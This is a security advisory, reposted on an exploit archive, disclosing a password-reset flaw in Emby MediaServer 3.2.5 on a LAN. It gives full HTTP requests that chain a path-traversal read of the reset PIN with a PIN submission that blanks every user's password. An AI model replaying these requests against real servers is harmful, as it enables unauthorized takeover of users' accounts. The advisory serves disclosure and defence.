what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Emby MediaServer 3.2.5 Password Reset

Emby MediaServer 3.2.5 Password Reset
Posted Apr 30, 2017
Authored by LiquidWorm | Site zeroscience.mk

Emby MediaServer version 3.2.5 suffers from a password reset vulnerability.

tags | exploit
SHA-256 | cd55b21a8347fa5960e9af67ccc648634aed53ed1e1e824ff18218bbc68ccdbe

Emby MediaServer 3.2.5 Password Reset

Change Mirror Download

Emby MediaServer 3.2.5 Password Reset Vulnerability


Vendor: Emby LLC
Product web page: https://www.emby.media
Affected version: 3.2.5
3.1.5
3.1.2
3.1.1
3.1.0
3.0.0

Summary: Emby (formerly Media Browser) is a media server designed to organize,
play, and stream audio and video to a variety of devices. Emby is open-source,
and uses a client-server model. Two comparable media servers are Plex and Windows
Media Center.

Desc: The issue can be triggered by an unauthenticated actor within the home network
(LAN) only. The attacker doesn't need to specify a valid username to reset the
password. He or she can enter a random string, and using the file disclosure issue
it's possible to read the PIN needed for resetting. This in turn will disclose all
the valid usernames in the emby server and reset all the passwords for all the users
with a blank password. Attackers can exploit this to gain unauthenticated and unauthorized
access to the emby media server management interface.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Ubuntu Linux 14.04.5
MacOS Sierra 10.12.3
SQLite3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2017-5401
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5401.php

SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098


22.12.2016

--


1. First we initiate the Forgot Password feature from within our home network:
------------------------------------------------------------------------------

http://10.211.55.3:8096/web/forgotpassword.html


2. Then, we type any random username and hit submit:
----------------------------------------------------

POST /emby/Users/ForgotPassword HTTP/1.1
Host: 10.211.55.3:8096
Connection: keep-alive
Content-Length: 32
accept: application/json
Origin: http://10.211.55.3:8096
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.211.55.3:8096/web/forgotpassword.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,mk;q=0.6
DNT: 1

EnteredUsername=RandomusUsuarius



3. You will get an alert message (Windows/Linux):
-------------------------------------------------

The following file has been created on your server and contains instructions on how to proceed:

C:\Users\lqwrm\AppData\Roaming\\Emby-Server\passwordreset.txt

-- OR --

/var/lib/emby-server/passwordreset.txt


4. Exploiting the file disclosure vulnerability (ZSL-2017-5403):
----------------------------------------------------------------

GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\lqwrm\AppData\Roaming\Emby-Server\passwordreset.txt HTTP/1.1
Host: 10.211.55.3:8096
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Connection: close

HTTP/1.1 200 OK
X-UA-Compatible: IE=Edge
Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
ETag: "c4fd834ac2fc99ff99d74c8e994a8a71"
Cache-Control: public
Expires: -1
Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Content-Type: text/plain
Date: Tue, 28 Feb 2017 12:14:51 GMT
Content-Length: 164
Connection: close

Use your web browser to visit:

http://10.211.55.3:8096/web/forgotpasswordpin.html

Enter the following pin code:

6727

The pin code will expire at 91



5. Following the instructions, entering the PIN, results in resetting all the passwords for all the emby users on the system:
-----------------------------------------------------------------------------------------------------------------------------

POST /emby/Users/ForgotPassword/Pin HTTP/1.1
Host: 10.211.55.3:8096
Connection: keep-alive
Content-Length: 9
accept: application/json
Origin: http://10.211.55.3:8096
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.211.55.3:8096/web/forgotpasswordpin.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,mk;q=0.6
DNT: 1

Pin=6272

---

We get the message:

Passwords have been removed for the following users. To login, sign in with a blank password.

testingus
test321
beebee
admin
ztefan
lio
miko
dni
embyusertest
joxypoxy
test123
thricer
teppei
admin2
delf1na

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close